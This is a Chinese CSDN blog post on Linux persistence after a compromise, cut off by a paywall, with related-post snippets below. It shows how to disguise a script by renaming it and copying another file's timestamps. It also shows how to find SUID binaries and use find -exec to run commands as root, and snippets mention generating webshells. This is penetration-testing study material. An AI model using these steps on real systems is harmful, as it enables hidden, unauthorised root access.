linux权限维持

已于 2023-10-27 19:19:28 修改
阅读量882 收藏
点赞数
分类专栏: 后渗透 文章标签: linux
于 2022-04-19 12:30:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32445755/article/details/124268455
版权

简介

我们知道前端安全包括了SQL注入,任意文件上传,XSS,CSRF,逻辑漏洞,跨域漏洞等等,我们可以将这些漏洞加以利用或组合来进行getshell的。在这里我们再区分一下getshell和webshell的区别,webshell更多的是获取前端的权限,顾名思义,一般仅限于前端或文件的增删改查;那么getshell则是获取更大的权限。一般的思路为挖掘漏洞,通过漏洞加以组合或利用获取webshell或后台权限,之后再进一步getshell。

文件属性修改

重命名文件

mv 1.sh prometheus-mmap202203

修改文件创建时间

这里就复刻了prometheus-mmap20220330-1580-x94lwp的属性,创建了一个同属性的prometheus-mmap202203

touch -r prometheus-mmap20220330-1580-x94lwp prometheus-mmap202203

提权

我们可以通过一下命令发现系统上运行所有suid可执行文件。不同系统命令不同。

find / -perm -u=s -type f 2>/dev/null

方式

我们首先查看具有root用户权限的SUID文件
find / -perm -u=s -type f 2>/dev/null
/usr/bin/find
/usr/bin/chfn
/usr/bin/kismet_cap_rz_killerbee
/usr/bin/ntfs-3g

发现find信息,利用find提权执行命令
└─$ /usr/bin/find /etc/opt -exec whoami \;
了解本专栏 订阅专栏 解锁全文 超级会员免费看
qq_1136014935
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
linux提权与权限维持
gugonggugong的博客
01-24 390
一、Linux提权 1. 内核提权 之脏牛漏洞提权 脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体为,Linux内核的内存子系统在处理写入复制(copy-on-write, COW)时产生了竞争条...
webshell管理工具(权限维持)笔记
边城浪子的博客
11-15 495
1.chopper 2.Cknife 3.WeBaCoo 命令:webacoo -g -o hack.php 连接命令:webacoo -t -u http://192.168.152.130/pentest/test/11/upload/hack.php 成功连接 4.Weevely 命令:weevely generate 123456 hack.php 命令:weevely http://1...
MSF后渗透权限维持
轻舟已过万重山
09-25 515
MSF后渗透阶段,创建后门用户,权限维持,后门维持的学习。
拿到GETSHELL之后的提权
weixin_69678131的博客
05-12 1398
getshell之后的提权
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2263
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据库
linux权限维持.pdf
03-31
linux权限维持.pdf
[总结]Linux权限维持1
08-03
1.[总结]SQL注总结 3.[后渗透]多姿势绕过 Powershell 调保护 5.[总结]加载 DLL 的多种式 7.[逆向]PE件格式解析 3. [WEB
linux suid权限维持速查表1
08-03
linux suid权限维持速查表linux suid 权限维持速查表赋权姿势:linux suid权限维持速查表linux suid权限维持速查表linux
网络安全-渗透中的权限维持-杨晓成-360
02-01
网络安全-渗透中的权限维持-杨晓成-360-下载版 权限维持 Windows相关 Linux相关 中间件 webshell
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
Getshell总结
qq_44790964的博客
01-18 2662
拿webshell的过程就是getshell 管理员权限shell 需要有管理员权限才可以拿shell 通常需要登录后台执行相关操作 直接上传脚本类型直接拿脚本 织梦的站今日后台就相当于拿到了管理员shell了 以为织梦的站里有一个文件式管理器 上传个大马就可以了 南方数据有个备份数据库 然后去找上传输数据地方上传木马 利用编译器漏洞拿webshell 常见编译器 fck ewebedito...
windows,linux 实战渗透 主机常见端口漏洞
12-15 7858
主机常见端口漏洞
linux 脚本 执行redis 绕过 auth,记一次Redis+Getshell经验分享
weixin_42548708的博客
05-11 423
你是我患得患失的梦,我是你可有可无的人,毕竟这穿越山河的箭,刺的都是用情之疾的人。前言:当我们接到一个授权渗透测试的时候,常规漏洞如注入、文件上传等尝试无果后,扫描端口可能会发现意外收获。知己知彼乃百战不殆,Redis介绍:简单来说 redis 就是一个Key-Value类型的数据库, redis 所有数据全部在内存中进行操作,并且它可以将内存中的数据定期存储在磁盘中,并且支持保存多种数据结构(S...
phpmyadmin新姿势getshell
Au
11-03 6577
百度百科:phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HT...
利用文件名进行GetShell---CTF题目的相关知识解析
rigous的博客
11-27 3705
0x00 今天白老师扔给我了一个虚拟机,里面有4道CTF的相关网站,我检视了一下,主要有四个文件夹,映射到了8081-8084四个端口。还有一个struts的漏洞测试环境。 首先主要看了下8084对应的题目,包括一道php登录绕过和命令执行漏洞,整个解题思路一波三折,很有意思。
Linux权限维持
最新发布
qq_29684215的博客
03-05 965
我们可以直接简单的把权限维持理解为我们在目标上安装了一个后门,权限维持的目的是保证自己的权限不会掉,一直控制住目标.
GitLab基础:MacOS下容器化方式无法启动问题的记录
知行合一 止于至善
11-21 3094
昨天验证GitLab的一个功能时,碰到了一个GitLab因空间不足导致的无法启动的问题,实际是因为Docker Desktop的设定限制的原因,这里memo一下。
Linux权限维持有哪些方法
04-29
Linux权限维持的方法有很多,其中一些常见的方法包括: 1. 提权攻击:攻击者利用系统中存在的漏洞获取root权限。 2. 密码猜测:攻击者通过猜测密码来获取用户的权限。 3. 社会工程学攻击:攻击者通过欺骗用户来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

qq_1136014935

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值